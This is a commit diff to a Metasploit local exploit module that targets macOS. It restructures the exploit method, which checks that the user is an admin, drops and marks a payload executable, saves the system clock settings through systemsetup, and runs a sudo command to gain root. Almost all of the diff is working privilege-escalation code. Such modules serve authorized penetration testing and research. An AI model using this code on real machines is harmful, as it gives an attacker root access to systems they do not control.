commit
546397e66f
|
@ -116,41 +116,29 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
def exploit
|
def exploit
|
||||||
if not user_in_admin_group?
|
if not user_in_admin_group?
|
||||||
fail_with(Exploit::Failure::NotFound, "User is not in the 'admin' group, bailing.")
|
fail_with(Exploit::Failure::NotFound, "User is not in the 'admin' group, bailing.")
|
||||||
else
|
|
||||||
# "remember" the current system time/date/network/zone
|
|
||||||
print_good("User is an admin, continuing...")
|
|
||||||
|
|
||||||
# drop the payload (unless CMD)
|
|
||||||
if using_native_target?
|
|
||||||
cmd_exec("mkdir -p #{File.dirname(drop_path)}")
|
|
||||||
write_file(drop_path, generate_payload_exe)
|
|
||||||
register_files_for_cleanup(drop_path)
|
|
||||||
cmd_exec("chmod +x #{[drop_path].shelljoin}")
|
|
||||||
print_status("Payload dropped and registered for cleanup")
|
|
||||||
end
|
|
||||||
|
|
||||||
print_status("Saving system clock config...")
|
|
||||||
@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
|
|
||||||
@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
|
|
||||||
@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
|
|
||||||
@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
|
|
||||||
@network_server = if @networked
|
|
||||||
cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
|
|
||||||
end
|
|
||||||
|
|
||||||
print_warning("Cleanup to be done in case something goes really bad")
|
|
||||||
print_warning("Execute: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
|
|
||||||
print_warning("Execute: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
|
|
||||||
print_warning("Execute: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
|
|
||||||
if @networked
|
|
||||||
print_warning("Execute: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
|
|
||||||
if @network_server
|
|
||||||
print_warning("Execute: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
|
|
||||||
end
|
|
||||||
end
|
|
||||||
|
|
||||||
run_sudo_cmd
|
|
||||||
end
|
end
|
||||||
|
# "remember" the current system time/date/network/zone
|
||||||
|
print_good("User is an admin, continuing...")
|
||||||
|
|
||||||
|
# drop the payload (unless CMD)
|
||||||
|
if using_native_target?
|
||||||
|
cmd_exec("mkdir -p #{File.dirname(drop_path)}")
|
||||||
|
write_file(drop_path, generate_payload_exe)
|
||||||
|
register_files_for_cleanup(drop_path)
|
||||||
|
cmd_exec("chmod +x #{[drop_path].shelljoin}")
|
||||||
|
print_status("Payload dropped and registered for cleanup")
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Saving system clock config...")
|
||||||
|
@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
|
||||||
|
@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
|
||||||
|
@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
|
||||||
|
@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
|
||||||
|
@network_server = if @networked
|
||||||
|
cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
|
||||||
|
end
|
||||||
|
|
||||||
|
run_sudo_cmd
|
||||||
end
|
end
|
||||||
|
|
||||||
def cleanup
|
def cleanup
|
||||||
|
|
Loading…
Reference in New Issue